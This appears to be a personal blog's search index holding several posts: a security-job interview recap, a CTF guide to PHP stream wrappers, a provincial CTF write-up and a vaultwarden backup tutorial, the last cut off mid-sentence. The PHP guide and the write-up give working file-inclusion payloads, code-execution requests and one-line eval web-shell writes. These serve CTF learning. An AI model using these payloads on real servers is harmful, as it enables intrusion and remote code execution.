local-search.xml
1002 lines (480 loc) · 581 KB
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>360 Security Researcher (Web) Autumn Recruitment Interview Experience</title>
<link href="/2023/10/22/360%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6%E5%91%98%EF%BC%88Web%E6%96%B9%E5%90%91%EF%BC%89%E7%A7%8B%E6%8B%9B%E9%9D%A2%E7%BB%8F/"/>
<url>/2023/10/22/360%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6%E5%91%98%EF%BC%88Web%E6%96%B9%E5%90%91%EF%BC%89%E7%A7%8B%E6%8B%9B%E9%9D%A2%E7%BB%8F/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>I was quite surprised when I received the interview notification, because I really had not expected that my lowly non-985/211 undergraduate background could pass the résumé screening of a big vendor-side company. The position was Security Researcher (Web vulnerability discovery and exploitation), based in Beijing. For a large security company, this interview was honestly a bit easy; it felt more like a KPI interview, with HR chasing their quota.</p><h2 id="面试题"><a href="#面试题" class="headerlink" title="面试题"></a>Interview questions</h2><p>1. Self-introduction, for example school experience, professional skills and project experience</p><p>2. Have you taken part in attack-and-defense exercises or HW (护网)?</p><p>3. The concrete process of intranet penetration</p><p>4. What are the ways of escalating privileges on Windows?</p><p>5. Have you ever taken over a domain controller during intranet penetration?</p><p>6. What vulnerabilities are related to domain environments?</p><p>7. The difference between golden tickets and silver tickets, and how each is used</p><p>8. What are the methods of making a trojan evade antivirus?</p><p>9. Which antivirus products have you successfully bypassed?</p><p>10. What deserialization vulnerabilities are there? Have you reproduced any? What are the key functions?</p><p>11. The principle of SSRF vulnerabilities and how to fix them</p><p>12. Do you hold any information-security certificates?</p><h2 id="感受"><a href="#感受" class="headerlink" title="感受"></a>Impressions</h2><p>After the interview, HR said they hoped to hire someone who knows intranet penetration and AV evasion to take part in attack-and-defense exercises, and that they only needed one person. I immediately felt this was KPI padding. It's over; there probably won't be a second round.</p>]]></content>
<categories>
<category>Life notes</category>
</categories>
<tags>
<tag>Interview experience</tag>
</tags>
</entry>
<entry>
<title>Notes on PHP pseudo-protocols</title>
<link href="/2023/03/31/%E5%85%B3%E4%BA%8EPHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<url>/2023/03/31/%E5%85%B3%E4%BA%8EPHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E9%82%A3%E4%BA%9B%E4%BA%8B/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>I have recently been preparing for an offline CTF attack-and-defense competition (AWD), and saw an article in which an experienced player mentioned that this topic may come up among the web vulnerabilities, so I am summarizing it here.</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><h3 id="file-协议"><a href="#file-协议" class="headerlink" title="file:// 协议"></a><code>file://</code> protocol</h3><ul><li><p><strong>Conditions</strong>:</p><ul><li><code>allow_url_fopen</code>: off/on</li><li><code>allow_url_include</code>: off/on</li></ul></li><li><p><strong>Purpose</strong>:<br>Used to access the local file system. In CTFs it is usually used to <strong>read local files</strong>, and it is not affected by <code>allow_url_fopen</code> or <code>allow_url_include</code>.<br>When the argument of <code>include()/require()/include_once()/require_once()</code> is controllable, a file that is not a <code>.php</code> file is still parsed as PHP; this is determined by how <code>include()</code> works.</p></li><li><p><strong>Description</strong>:<br><code>file://</code> is the default wrapper used by PHP and represents the local file system. When a relative path is given (one that does not start with <code>/</code>, <code>\</code>, <code>\\</code> or a Windows drive letter), the path is resolved relative to the current working directory. In many cases this is the directory of the script, unless it has been changed. When using the CLI, the default is the directory the script was invoked from. In some functions, such as <code>fopen()</code> and <code>file_get_contents()</code>, <code>include_path</code> is optionally searched as well, also as a relative path.</p></li><li><p><strong>Usage</strong>:</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext
</code></pre></figure></li><li><p><strong>Examples</strong>:</p><ol><li><p><code>file://[absolute path and file name]</code></p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQAZ"></p></li><li><p><code>[relative path and file name]</code></p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=./phpinfo.txt
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQA1"></p></li><li><p><code>[http://network path and file name]</code></p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBb"></p></li></ol></li><li><p><strong>Reference</strong>: <a href="https://link.segmentfault.com/?enc=wN8Voz1wQkMJEemKlJJ2Hg==.B7/oPK88148LTdDJACy8tIvD+waqAYHD7ErsU8Ngn+GVQafNAfZtIyschsiALxnZ">http://php.net/manual/zh/wrappers.file.php</a></p></li></ul><h3 id="php-协议"><a href="#php-协议" class="headerlink" title="php:// 协议"></a><code>php://</code> protocol</h3><ul><li><p><strong>Conditions</strong>:</p><ul><li><code>allow_url_fopen</code>: off/on</li><li><code>allow_url_include</code>: on is required only for <code>php://input php://stdin php://memory php://temp</code></li></ul></li><li><p><strong>Purpose</strong>:<br><code>php://</code> accesses the various input/output streams (I/O streams). In CTFs the ones used most often are <code>php://filter</code> and <code>php://input</code>: <code>php://filter</code> is used to <strong>read source code</strong>, and <code>php://input</code> is used to <strong>execute PHP code</strong>.</p></li><li><p><strong>Description</strong>:<br>PHP provides a number of miscellaneous input/output (I/O) streams that allow access to PHP's own input and output streams, the standard input, output and error descriptors,<br>in-memory and disk-backed temporary file streams, and filters that can manipulate other file resources as they are read and written.</p><table><thead><tr><th>Protocol</th><th>Purpose</th></tr></thead><tbody><tr><td>php://input</td><td>A read-only stream that gives access to the raw request body. In a POST request it accesses the <code>data</code> part of the POST; <code>php://input</code> is not available when <code>enctype="multipart/form-data"</code> is used.</td></tr><tr><td>php://output</td><td>A write-only stream that allows writing to the output buffer in the same way as print and echo.</td></tr><tr><td>php://fd</td><td>(>=5.3.6) Allows direct access to the given file descriptor. For example, <code>php://fd/3</code> refers to file descriptor 3.</td></tr><tr><td>php://memory php://temp</td><td>(>=5.1.0) File-like wrapper streams that allow temporary data to be read and written. The only difference between the two is that <code>php://memory</code> always keeps its data in memory, whereas <code>php://temp</code> stores the data in a temporary file once the amount held in memory reaches a predefined limit (<code>2MB</code> by default). The temporary file location is determined in the same way as <code>sys_get_temp_dir()</code>.</td></tr><tr><td>php://filter</td><td>(>=5.0.0) A meta-wrapper designed to apply filters to a stream at the time it is opened. It is very useful with all-in-one file functions such as <code>readfile()</code>, <code>file()</code> and <code>file_get_contents()</code>, where there is otherwise no chance to apply a filter before the stream contents are read.</td></tr></tbody></table></li><li><p><strong>The <code>php://filter</code> parameters in detail</strong></p><p>The parameters of this wrapper are passed as part of the wrapper path, and several parameters can be passed in one path. See the following for details:</p><table><thead><tr><th>php://filter parameter</th><th>Description</th></tr></thead><tbody><tr><td>resource=&lt;stream to be filtered&gt;</td><td>Required. It specifies the stream you want to filter.</td></tr><tr><td>read=&lt;filter list for the read chain&gt;</td><td>Optional. One or more filter names can be given, separated by the pipe character (<code>|</code>).</td></tr><tr><td>write=&lt;filter list for the write chain&gt;</td><td>Optional. One or more filter names can be given, separated by the pipe character (<code>|</code>).</td></tr><tr><td>&lt;; two chains of filters&gt;</td><td>Any filter list that is not prefixed with <em>read=</em> or <em>write=</em> is applied to the read or write chain as appropriate.</td></tr></tbody></table></li><li><p><strong>Available filters (4 categories)</strong></p><p>Only the main filter types are listed here; for details see: <a href="https://link.segmentfault.com/?enc=SnFuHeLl8SsTJmIpSWP0Yw==.ETJk2Pqi7vlCSXba+uHtDNwwCcWsT+/ktK0RqslXfHUl5ueM4px2wLhoUdVxz/aO">https://www.php.net/manual/zh/filters.php</a></p><table><thead><tr><th>String filter</th><th>Effect</th></tr></thead><tbody><tr><td>string.rot13</td><td>Equivalent to <code>str_rot13()</code>; ROT13 transformation</td></tr><tr><td>string.toupper</td><td>Equivalent to <code>strtoupper()</code>; converts to upper case</td></tr><tr><td>string.tolower</td><td>Equivalent to <code>strtolower()</code>; converts to lower case</td></tr><tr><td>string.strip_tags</td><td>Equivalent to <code>strip_tags()</code>; strips HTML and PHP tags</td></tr></tbody></table><table><thead><tr><th>Conversion filter</th><th>Effect</th></tr></thead><tbody><tr><td>convert.base64-encode &amp; convert.base64-decode</td><td>Equivalent to <code>base64_encode()</code> and <code>base64_decode()</code>; Base64 encoding and decoding</td></tr><tr><td>convert.quoted-printable-encode &amp; convert.quoted-printable-decode</td><td>Encoding and decoding between quoted-printable strings and 8-bit strings</td></tr></tbody></table><table><thead><tr><th>Compression filter</th><th>Effect</th></tr></thead><tbody><tr><td>zlib.deflate &amp; zlib.inflate</td><td>A way to create gzip-compatible files on the local file system, but without the header and trailer produced by command-line tools such as gzip; only the payload part of the stream is compressed or decompressed.</td></tr><tr><td>bzip2.compress &amp; bzip2.decompress</td><td>As above, a way to create bz2-compatible files on the local file system.</td></tr></tbody></table><table><thead><tr><th>Encryption filter</th><th>Effect</th></tr></thead><tbody><tr><td>mcrypt.*</td><td>libmcrypt symmetric encryption algorithms</td></tr><tr><td>mdecrypt.*</td><td>libmcrypt symmetric decryption algorithms</td></tr></tbody></table></li><li><p><strong>Examples</strong>:</p><ol><li><p><code>php://filter/read=convert.base64-encode/resource=[file name]</code> reads a file's source (for PHP files, Base64 encoding is required)</p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBf"></p></li><li><p><code>php://input + [POST DATA]</code> executes PHP code</p><figure class="highlight php"><pre><code class="hljs php">http://127.0.0.1/include.php?file=php://input
[POST DATA part]
&lt;?php phpinfo(); ?&gt;
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBh"></p><p>If there is write permission, a one-line web shell can be written:</p><figure class="highlight php"><pre><code class="hljs php">http://127.0.0.1/include.php?file=php://input
[POST DATA part]
&lt;?php fputs(fopen('1juhua.php','w'),'&lt;?php @eval($_GET[cmd]); ?&gt;'); ?&gt;
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBi"></p></li></ol></li><li><p><strong>Reference</strong>: <a href="https://link.segmentfault.com/?enc=9HIcngQDd6zUVI2rWGfPmw==.K75pS9JvEddLh+oG19cnYbxWhCidEHXa723x8dV3Dri0Jd5sqTgvjskmwx+6+Qcu">https://php.net/manual/zh/wrappers.php.php</a></p></li></ul><h3 id="zip-amp-bzip2-amp-zlib-协议"><a href="#zip-amp-bzip2-amp-zlib-协议" class="headerlink" title="zip:// & bzip2:// & zlib:// 协议"></a><code>zip:// &amp; bzip2:// &amp; zlib://</code> protocols</h3><ul><li><p><strong>Conditions</strong>:</p><ul><li><code>allow_url_fopen</code>: off/on</li><li><code>allow_url_include</code>: off/on</li></ul></li><li><p><strong>Purpose</strong>: <code>zip:// &amp; bzip2:// &amp; zlib://</code> are all compression streams that can access files inside an archive. More importantly, no particular extension is required; the archive can be renamed to any extension such as <code>jpg png gif xxx</code>.</p></li><li><p><strong>Examples</strong>:</p><ol><li><p><code>zip://[absolute path of the archive]%23[name of the file inside the archive]</code> (# is encoded as %23)</p><p>Compress phpinfo.txt into phpinfo.zip, rename the archive to phpinfo.jpg and upload it</p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBj"></p></li><li><p><code>compress.bzip2://file.bz2</code></p><p>Compress phpinfo.txt into phpinfo.bz2 and upload it (any extension is likewise supported)</p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBt"></p></li><li><p><code>compress.zlib://file.gz</code></p><p>Compress phpinfo.txt into phpinfo.gz and upload it (any extension is likewise supported)</p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBu" alt="image"></p></li></ol></li><li><p><strong>Reference</strong>: <a href="https://link.segmentfault.com/?enc=GiuGtHKAlZaKFkSBJmrlIw==.3xzOWnz45qNJyV6WkZqliObZtNIx9DWj2NJRfc5GU1fCWvS7DmJT6+K3m537FnTpJz4QABp8678tfw9FRe+jCw==">http://php.net/manual/zh/wrappers.compression.php</a></p></li></ul><h3 id="data-协议"><a href="#data-协议" class="headerlink" title="data:// 协议"></a><code>data://</code> protocol</h3><ul><li><p><strong>Conditions</strong>:</p><ul><li><code>allow_url_fopen</code>: on</li><li><code>allow_url_include</code>: on</li></ul></li><li><p><strong>Purpose</strong>: Since <code>PHP>=5.2.0</code>, the <code>data://</code> stream wrapper can be used to pass data in the corresponding format. It is usually used to execute PHP code.</p></li><li><p><strong>Usage</strong>:</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">data://text/plain,
data://text/plain;base64,
</code></pre></figure></li><li><p><strong>Examples</strong>:</p><ol><li><p><code>data://text/plain,</code></p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=data://text/plain,&lt;?php%20phpinfo();?&gt;
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBB" alt="image"></p></li><li><p><code>data://text/plain;base64,</code></p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBD" alt="image"></p></li></ol></li></ul><h3 id="http-amp-https-协议"><a href="#http-amp-https-协议" class="headerlink" title="http:// & https:// 协议"></a><code>http:// &amp; https://</code> protocols</h3><ul><li><p><strong>Conditions</strong>:</p><ul><li><code>allow_url_fopen</code>: on</li><li><code>allow_url_include</code>: on</li></ul></li><li><p><strong>Purpose</strong>: The ordinary URL form; allows read-only access to files or resources via the <code>HTTP 1.0</code> GET method. In CTFs it is usually used for remote file inclusion.</p></li><li><p><strong>Usage</strong>:</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">http://example.com
http://example.com/file.php?var1=val1&amp;var2=val2
http://user:password@example.com
https://example.com
https://example.com/file.php?var1=val1&amp;var2=val2
https://user:password@example.com
</code></pre></figure></li><li><p><strong>Example</strong>:</p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBP" alt="image"></p></li></ul><h3 id="phar-协议"><a href="#phar-协议" class="headerlink" title="phar:// 协议"></a><code>phar://</code> protocol</h3><p>The <code>phar://</code> wrapper is similar to <code>zip://</code> and can likewise access the contents of a zip-format archive; only one example is given here:</p><figure class="highlight http"><pre><code class="hljs http">http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
</code></pre></figure><p><img src="https://segmentfault.com/img/bVbrQBX"></p><p>In addition, at Black Hat 2018 researchers presented a new attack technique against PHP applications: <strong>phar:// object injection</strong>.</p><p>Because this technique requires certain conditions to be met before it can be used, the following article can be consulted; its demo is also very detailed. I'll leave it for a dedicated study later.</p>]]></content>
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>Write-up for the semifinal of the 2nd Hubei Province College Student Xinchuang (IT Application Innovation) Competition</title>
<link href="/2023/03/07/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E2%80%9C%E6%B9%96%E5%8C%97%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E5%88%9B%E5%A4%A7%E8%B5%9B%E2%80%9C%E5%A4%8D%E8%B5%9BWrite-up/"/>
<url>/2023/03/07/%E7%AC%AC%E4%BA%8C%E5%B1%8A%E2%80%9C%E6%B9%96%E5%8C%97%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E5%88%9B%E5%A4%A7%E8%B5%9B%E2%80%9C%E5%A4%8D%E8%B5%9BWrite-up/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>Since the preliminary round of this competition took the form of a knowledge quiz, there is no write-up for it; this is noted here for the record. This is a belated write-up: more than four months have passed since the online semifinal, the offline final was also long delayed, and I only got hold of the write-up a few days ago. Reproduction or republication without my permission is prohibited!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><h3 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h3><h4 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h4><p>Start the environment and obtain the source code:</p><figure class="highlight php"><pre><code class="hljs php">&lt;?php
highlight_file(__FILE__);
error_reporting(0);
echo "&lt;h1&gt;WELCOME 23333333333&lt;/h1&gt;"."\n";
$url = $_SERVER["HTTP_REFERER"];
$r = parse_url($url);
if(!empty($r['host']) &amp;&amp; $r['host'] === 'localhost' &amp;&amp; $r['scheme'] === 'file'){
    echo "yeah u are admin"."&lt;br&gt;";
}
else{
    die('u are not admin'."&lt;br&gt;");
}

//only admin can do it
$content = addslashes($_GET['content']);
echo 'now_you_are_admin'."&lt;br&gt;";
if(!file_exists("admin.php")){
    file_put_contents('admin.php', "secret = 'xxx'");
    //change the content
    if($content){
        $file = file_get_contents("./admin.php");
        $file = preg_replace("/secret = '.*'/", "secret = '{$content}'", $file);
        file_put_contents('./admin.php', $file);
    }
}

if (isset($_GET['reset'])){
    @exec('/bin/rm -rf admin.php');
}

?&gt;
</code></pre></figure><p>The source has two parts: identity verification and writing a file.</p><p>The first part, identity verification, requires forging the admin identity. The check inspects the <code>Referer</code> request header and requires the file scheme with localhost as the host.</p><p>The second part writes a file, which is used to plant a web shell. The challenge filters with the <code>addslashes</code> function, so quotes are escaped and cannot be used. The content written is <code>&lt;?php eval($_GET[1]);?&gt;</code>, which avoids quotes:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041821877.png"></p><p>Visit <code>admin.php</code> and pass a GET parameter for arbitrary code execution. I went with passing the parameter via POST and then connecting with AntSword, which also gets the flag.</p><h4 id="tjjz"><a href="#tjjz" class="headerlink" title="tjjz"></a>tjjz</h4><p>Well, I never expected the challenge name itself to be the knowledge point being tested (tjjz are the pinyin initials of 条件竞争, race condition); I honestly did not catch on. This challenge tests file upload combined with a race condition.</p><p>Testing showed that the environment does not allow existing files to be overwritten, and the <code>upload</code> directory presumably contains a <code>.htaccess</code> file, which makes uploading a configuration file infeasible.</p><p>Build a request in Burp Suite and brute-force it. Judging from the previous challenge, the flag is presumably still in the flag file in the root directory, so <code>system('cat /f*')</code> is used for a simple test:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041821030.png" alt="web-2"></p><p>Set the thread count to 50 and keep sending; open another replayed request with 10 threads, and after a while a response comes back:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041822774.png" alt="web-3"></p><p>Flag obtained.</p><h3 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h3><h4 id="crab"><a href="#crab" class="headerlink" title="crab"></a>crab</h4><p>The decompiled source is as follows:</p><figure class="highlight c++"><pre><code class="hljs c++">_BYTE *__fastcall crab_0o0(_BYTE *a1)
{
  _BYTE *v1; // rax
  _BYTE *result; // rax
  _BYTE *v3; // [rsp+0h] [rbp-18h]
  _BYTE *v4; // [rsp+10h] [rbp-8h]
  _BYTE *i; // [rsp+10h] [rbp-8h]

  v3 = a1;
  v4 = a1;
  do
    v1 = v4++;
  while ( *v1 );
  for ( i = v4 - 2; ; --i )
  {
    result = v3;
    if ( v3 >= i )
      break;
    *v3 ^= *i;
    *i ^= *v3;
    *v3++ ^= *i;
  }
  return result;
}
</code></pre></figure><p>The ciphertext is: <code>pWERzO3YjCldk:2NkGkc</code></p><p>Since XOR is reversible, this part does not need to be inverted by hand; a Python script can simply be run:</p><figure class="highlight python"><pre><code class="hljs python">s='pWERzO3YjCldk:2NkGkc'
enc=[ord(i) for i in s]
for i in range(len(enc)):
    enc[i]-=1
print(bytes(enc)) # b'oVDQyN2XiBkcj91MjFjb'
</code></pre></figure><p>Then the C script:</p><figure class="highlight c"><pre><code class="hljs c">#include &lt;stdio.h&gt;
#define _BYTE char
int main(int argc,char **argv,char *envp[])
{
    char a1[]="oVDQyN2XiBkcj91MjFjb";
    _BYTE *v1; // rax
    _BYTE *v2; // [rsp+0h] [rbp-18h]
    _BYTE *v3; // [rsp+10h] [rbp-8h]
    _BYTE *i; // [rsp+10h] [rbp-8h]

    v2 = a1;
    v3 = a1;
    do
        v1 = v3++;
    while ( *v1 );
    for ( i = v3 - 2; v2 &lt; i; --i )
    {
        *v2 ^= *i;
        *i ^= *v2;
        *v2++ ^= *i;
    }
    puts(a1);
    //bjFjM19jckBiX2NyQDVo
    return 0;
}
</code></pre></figure><p>Base64-decoding gives the flag:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041822243.png" alt="re"></p><h3 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h3><h4 id="没有文件后缀"><a href="#没有文件后缀" class="headerlink" title="没有文件后缀"></a>No file extension</h4><p>If I had not read the write-up, I would not have known that this challenge has an original source; as expected of a provincial competition (doge).</p><p>The source is: <a href="https://blog.csdn.net/zz_Caleb/article/details/88601860">https://blog.csdn.net/zz_Caleb/article/details/88601860</a></p><p>Flag: <code>CTF{131Ack_3Y3_gA1AxY}</code></p><h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><h4 id="古典"><a href="#古典" class="headerlink" title="古典"></a>Classical</h4><p>A warm-up challenge; many teams solved it very early. (Why am I so bad that it took me so long? qwq)</p><p>Opening it reveals a Base-family encoding; trying the online tools one by one shows it is Base32:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041823574.png" alt="cry-1"></p><p><code>synt</code> is what you get by applying a 13-position Caesar shift to <code>flag</code>:</p><p><img src="https://raw.githubusercontent.com/RookieTerry/RookieTerry.github.io/main/img/202305041822160.png" alt="cry-2"></p><p>Flag: <code>flag{791ee565-afde-4772-89a7-6cddd6d0863f}</code></p><h4 id="alice-and-bob"><a href="#alice-and-bob" class="headerlink" title="alice and bob"></a>alice and bob</h4><p>Alice and Bob are the classic characters of RSA. The attachment contains only four numbers, so it is reasonable to guess they are n and c: a typical case of moduli that are not coprime (they share a prime factor). The large ones are n, the small ones are c; try e = 65537:</p><figure class="highlight python"><pre><code class="hljs python">from Crypto.Util.number import *
c1 = 0xa30e64bef4373f1ffdb9f6e116643ccef2f1f5e2509ee3937b7c3af6b36b5ef532cfbdeda
n1 = 0xe543df8c958aa57dbaea1ec39c192e5a8b26a64fbdcb3073ba388bc189fb645afd600b256
c2 = 0x3940203d1de79f980e30497847f25ca8562493310b2953570d435fa98bc7259ea119033c0
n2 = 0x9254d235f837be7093dadd7e89af96c43a919a0198b9e7f378a690fe8c655a42dffdaad9d
q=GCD(n1,n2)
print(isPrime(q))

p1=n1//q
p2=n2//q
print(isPrime(p1))
print(isPrime(p2))
e=65537
d1=inverse(e,(p1-1)*(q-1))
d2=inverse(e,(p2-1)*(q-1))

m1=pow(c1,d1,n1)
m2=pow(c2,d2,n2)

print(long_to_bytes(m1))
print(long_to_bytes(m2))
</code></pre></figure><p>Sure enough, that is the case; the final flag is: <code>flag{real_man_wear_black_suit}</code></p>]]></content>
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>Setting up vaultwarden on a home server (Part 2)</title>
<link href="/2023/01/09/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%BA%8C%EF%BC%89/"/>
<url>/2023/01/09/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%BA%8C%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>In the previous article we covered how to set up the <code>vaultwarden</code> server. In this one I will show you an advanced trick: scheduled backups. But first, a quick aside:</p><blockquote><p>The <code>docker-compose.yml</code> from last time can actually be shortened to the following:</p><figure class="highlight yaml"><pre><code class="hljs yaml">version: "3"
services:
  vaultwarden:  # container name, can be changed
    image: "vaultwarden/server:latest"
    restart: unless-stopped
    volumes:
      - /vw-data/:/data/  # left side is the host directory, right side is inside the container
    environment:
      SIGNUPS_ALLOWED: "false"  # forbid registration by other people
      WEBSOCKET_ENABLED: "true"  # enable live sync
      INVITATIONS_ALLOWED: "true"  # allow registration by invitation
      ADMIN_TOKEN: xxxxxx  # generate your own

  nginxpm:  # container name, can be changed
    image: 'jc21/nginx-proxy-manager:latest'
    restart: unless-stopped
    ports:
      - '10042:80'
      - '10041:81'
      - '10043:443'
</code></pre></figure><p>This merges pulling both images and starting the containers into a single step, saving a lot of fiddly work.</p><p><strong>Note: the first time you create the <code>vaultwarden</code> container you still need to do it through the graphical interface; only after you have created your username and password can you start it with the <code>yaml</code> file above.</strong></p></blockquote><p>With the BaoTa panel (宝塔面板), scheduled backups are actually easy. Using plugins from its App Store we can sync the password database to a public cloud or to a private one. Let me explain in detail!</p><h2 id="备份到公有云"><a href="#备份到公有云" class="headerlink" title="备份到公有云"></a>Backing up to a public cloud</h2><p>Here I use Tencent Cloud COS as the example (actually because last Singles' Day I bought 50 GB for just 1 yuan, which is practically free, so why not use it).</p><p>First log in to Tencent Cloud; after real-name verification, choose "Object Storage" from the "Cloud Products" drop-down:</p><p><img src="https://s2.loli.net/2023/01/13/LHcE2GYKkyAPCw7.png"></p><h3 id="创建存储桶"><a href="#创建存储桶" class="headerlink" title="创建存储桶"></a>Create a bucket</h3><p>After buying the appropriate plan, create a bucket:</p><p><img src="https://s2.loli.net/2023/01/13/VeCLBOjwpnlxJP5.png"></p><p><img src="https://s2.loli.net/2023/01/13/K83gupERrm574yd.png"></p><p>Finally click "Create".</p><h3 id="创建子用户"><a href="#创建子用户" class="headerlink" title="创建子用户"></a>Create a sub-user</h3><p>Next open "Cloud Products" - "Access Management" - "Users" - "User List" and create a new sub-user, choosing "Custom creation" as the type:</p><p><img src="https://s2.loli.net/2023/01/13/baxwjhnI7tJc9ik.png"></p><p><img src="https://s2.loli.net/2023/01/13/DhbXNcxZ39jwKfn.png"></p><p><img src="https://s2.loli.net/2023/01/13/1OcfoG3dxtJiezE.png"></p><p>In the policy step we only need to select one permission, <code>QcloudAccessForCOSBatchRole</code>, so that this sub-user can only operate on COS resources and cannot touch the other services in the account:</p><p><img src="https://s2.loli.net/2023/01/13/tEG5pr1zHQPZTBa.png"></p><p>User tags can be skipped. Save the generated <code>SecretId</code> and <code>SecretKey</code> and copy them into the BaoTa plugin.</p><h3 id="设置插件"><a href="#设置插件" class="headerlink" title="设置插件"></a>Configure the plugin</h3><p>First search for and install the "Tencent Cloud COS" plugin in the BaoTa panel's "App Store" (not shown here). The settings are as in the screenshot:</p><p><img src="https://s2.loli.net/2023/01/13/HbeAKlGoXcNdCBV.png"></p><h3 id="auto-backup">Set up automatic backups</h3><p>Finally, under "Cron Jobs" in the left sidebar of the BaoTa panel, set up a scheduled automatic backup:</p><p><img src="https://s2.loli.net/2023/01/13/voTRN1zndWLbgyI.png"></p><p>OK, all done! The backup schedule can of course be changed.</p><h2 id="备份到私有云"><a href="#备份到私有云" class="headerlink" title="备份到私有云"></a>Backing up to a private cloud</h2><p>Some of you may worry: backing up to a public cloud, and a domestic one at that (you know what I mean), still isn't reassuring. If you happen to be well off, consider buying a NAS; if you already have one, ignore that. Here I use a Synology NAS as the example. Log in to the web management page, open "Control Panel" - "File Services" - "FTP" and enable the FTP service:</p><p><img src="https://s2.loli.net/2023/01/13/Ob3ztVSrglNuE7H.png" alt="The SFTP service below can be enabled too"></p><h3 id="创建专用账户"><a href="#创建专用账户" class="headerlink" title="创建专用账户"></a>Create a dedicated account</h3><p>Click "User &amp; Group" - "User" - "Create" on the left and create an account dedicated to the FTP service:</p><p><img src="https://s2.loli.net/2023/01/13/7b8FnLzdcAW2lo5.png"></p><p><img src="https://s2.loli.net/2023/01/13/zFlkOQr84yTp1fP.png"></p><p>In the next step, grant read/write permission only on the backup folder (which has to be created separately under "Shared Folder") and set everything else to "No access"; I won't show a screenshot for privacy reasons, and the remaining options are up to you. For application permissions, allow only FTP and SFTP:</p><p><img src="https://s2.loli.net/2023/01/13/h6zA7PZEMSJqWG4.png" alt="Forgot to draw the arrow for SFTP"></p><h3 id="设置插件-1"><a href="#设置插件-1" class="headerlink" title="设置插件"></a>Configure the plugin</h3><p>After checking the remaining options, click Finish. Then go to the BaoTa panel's "App Store", search for and install the "FTP storage" plugin, and configure it as shown below:</p><p><img src="https://s2.loli.net/2023/01/13/GnJbleOxcfi2MkC.png" alt="Username is the one just created; IP is the LAN address"></p><p>The scheduled backup is set up the same way as for the <a 